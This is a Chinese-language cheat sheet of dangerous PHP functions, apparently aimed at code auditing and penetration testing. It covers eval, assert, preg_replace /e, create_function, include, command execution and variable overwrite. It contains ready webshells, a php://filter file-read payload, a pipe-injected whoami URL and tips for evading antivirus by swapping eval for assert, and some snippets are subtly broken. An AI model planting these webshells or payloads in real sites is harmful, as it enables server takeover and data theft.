1 php代码执行函数

1.2 eval

mixed eval(string $code)
把字符串$code作为PHP代码执行。
很多常见的webshell都是用eval来执行具体操作的。
<?php @eval($_POST['v']);?>


bool assert(mixed $assertion [, string $description])  //调试函数
检查一个断言是否为FALSE，（把字符串$assertion作为PHP代码执行）
因为大多数杀软把eval列入了黑名单了，所以用assert来替代eval来执行具体操作的。
<?php $_GET[a]($_GET[b]);?>
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PDwaHAgQGV2YWw%29%29};

@eval('echo "test";');
echo "test";

@eval('echo "test";');
echo "\r\n"
echo "test";

结果：
test
test

1.2 assert

assert('system("whoami");');

因为大多数杀毒软件把eval 列入黑名单，所以用assert来代替eval来执行具体操作

1.3 preg_replace

mixed preg_replace(mixed $pattern, mixed $replacement, mixed $subject [, int $limit= -1 [, int &$count]])

/e修正符使preg_replace()将replacement参数当作PHP代码

 
preg_replace("/test/e","phpinfo();","jutst test");
如果我们提交?h=phpinfo(), phpinfo()将会被执行

1.4 匿名函数

php特性，变量可以当作函数名执行。

string create_function(sting $args, sting $code)
创建一个匿名函数，并返回独一无二的函数名。
$newfunc = create_function('$v', 'return system(&v);');
$newfunc('whoami');相当于system('whoami');


$cfunc = create_function('$v', 'return system($v);');
$cfunc('whoami');

结果：
shadowtest\shadowtest


 另外一种形式的匿名函数
$sfunc = 'sys'.'tem';
$sfunc('whoami');

结果：
shadowtest\shadowtest

1.5 回调函数

• mixed call_user_func(callabel $callback [,mixed $parameter [, mixed $...]])
  第一个参数callback是被调用的回调函数，其余参数是回调函数的参数

function test($var){
  echo "callable test $var";
}
call_user_func('test','shadowtest');
call_user_func('system','whoami)

结果：
callable test shadowtest
shadowtest\shadowtest

• mixed call_user_func_array(callable $callback, array $param_arr)
  第一个参数作为回调函数（callback）调用，把参数数组（param_arr)作为回调函数的参数传入

2 包含函数

• require
• include
• require_once
• include_once

包含函数一共有四个，主要作用为包含并运行指定文件(运行php标签里的php代码）

include $file;

include($_GET['file']);

在变量$file可控的情况下，我们可以包含任意文件，从而达到getshell的目的。
另外，在不同的配置环境下，可以包含不同的文件。
因此又分为远程文件包含和本地文件包含。
包含函数也能够读取任意文件内容，这就需要用到【支持的协议和封装的协议】和【过滤器】。例如，利用php流读取任意文件

include($_GET['file']);
?file=php://filter/convert.base64-encode/resource=index.php

3 命令执行函数

执行函数包括但不限于下述几个。

3.1 exec()

执行一个外部程序

3.2 passthru()

执行外部程序并且显示原始输出

3.3 proc_open()

执行一个命令，并且打开用来输入/输出的文件指针

3.4 shell_exec()

echo shell_exec('ping 127.0.0.1');

echo shell_exec('ping' . $_GET["v"]);
#访问http://www.shadowflow.com/test_fun.php?v=127.0.0.1|whoami执行whoami系统命令

通过shell环境执行命令，并且将完整的输出以字符串的方式返回。

3.5 system()

执行外部程序，并且显示输出

3.6 popen()

通过popen()的参数传递一条命令，并对popen()所打开的文件进行执行

4 文件操作函数

copy------------------------拷贝文件
file_get_contents---------将整个文件读入一个字符串
file_put_contents---------将一个字符串写入文件
file----------------------------把整个文件读入一个数组中
fopen------------------------打开文件或者url
move_uploaded_file----将上传的文件移动到新位置
readfile----------------------输出文件
rename---------------------重命名一个文件或目录
rmdir------------------------删除目录
unlink & delete-----------删除文件

任意文件读取，写入， 删除往往是上面几个函数受到了控制（当然还有其他函数）

读取：可以读取配置等文件，拿到key
写入：可以写入shell代码相关的内容
删除：可以删除.lock文件而可以重新安装覆盖

5 特殊函数

5.1 信息泄露

phpinfo()

5.2 软连接-读取文件内容

symlink()
一般是在linux服务器上使用的，为一个目标建立一个连接，在读取这个链接所连接的文件的内容，并返回内容

readlin()

5.3 环境变量

string getenv (string $varname)
获取一个环境变量的值

bool putenv(string $setting)
添加setting 到服务器环境变量。环境变量仅存活于当前请求期间。在请求结束时环境会恢复到初始状态

5.5 加载扩展：

bool dl (string $library)
载入指定参数library的PHP扩展

5.6 配置相关

• string ini_get(string $varname)
  成功时返回配置选项的值
• string ini_set(string $varname,string $newvalue)
  string ini_alter(string $varname, string $newvalue)
  设置指定配置选项的值。这个选项会 在脚本运行时保持新的值，并在脚本结束时恢复。
• void ini_restore(string $varname)
  恢复指定的配置选项到它的原始值

5.7 数字判断

bool is_numeric(mixed $var)
仅用is_numeric判断而不是用intval转换就有可能插入十六进制的字符串到数据库，进而可能导致sql二次注入
十六进制绕过

5.8 数组相关

bool in_array (mixed $needle, array $haystack [,bool $strict=FALSE])
在haystack中搜索needle,如果没有设置strict则使用宽松的比较。
该函数有一个特性，比较之前会进行自动类型转换

$v = 1;
var_dump(in_array($v,array("1",2,3))); //1 == "1"
echo "\r\n<br />";
var_dump(in_array($v,array("1",2,3),true)); //1 ==="1"
echo "\r\n<br />";
$v = '1abc';
var_dump(in_array($v,array(1,2,3)));//'1abc' == 1
echo "\r\n<br />";
var_dump(in_array($v,array("2",2,3)));

结果：
true
false
true
false

5.9 变量覆盖相关

 void parse_str(string  &str [, array &$star])

如果str是URL传递入的查询字符串（query string ),则将它解析为变量并设置到当前作用域

int extract(array & $var_array [,int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL

本函数用来将变量从数组中导入到当前的符号表中。检查每个键名看是否可以作为一个合法的变量名，同事也检查和符号表中已有的变量名的冲突

bool mb_parse_str (string $encoded_string [,array &$result])

解析GET/POST/COOKIE数据并设置全局变量。由于PHP不提供原始POST/COOKIE数据，目前它仅能够用于GET数据。它解析了URL编码过的数据，检测其编码，并转换编码为内部编码，然后设置其值为array的result或者全局变量

bool import_request_variables(string $type [,string $prefix])

将GET/POST/Cookie变量导入到全局作用域中，如果你禁用了register_globals, 但又想用到一些全局变量，那么此函数就很有用

5.10 列目录

glob()函数依照libc glob()函数使用规则寻找所有与pattern匹配的文件路径，类似于一般shells所用的规则一样。不进行缩写扩展或参数代替。

echo "<pre>"
print_r(glob("*.php"));

5.11 无参数获取信息

array get_defined_vars(void)

返回一个包含所有已定义变量列表的多维数组，这些变量包括环境变量，服务器变量和用户定义的变量。

array get_defined_constants([bool $categorase=false])

返回当前已定义的常量名和值。这包含define（）函数创建的，也包含了所有扩展所创建的

array get_defined_functions(void)

返回一个包含所有已定义函数列表的多维数组

array get_include_files(void)

返回所有被include,include_once,require和require_once的文件名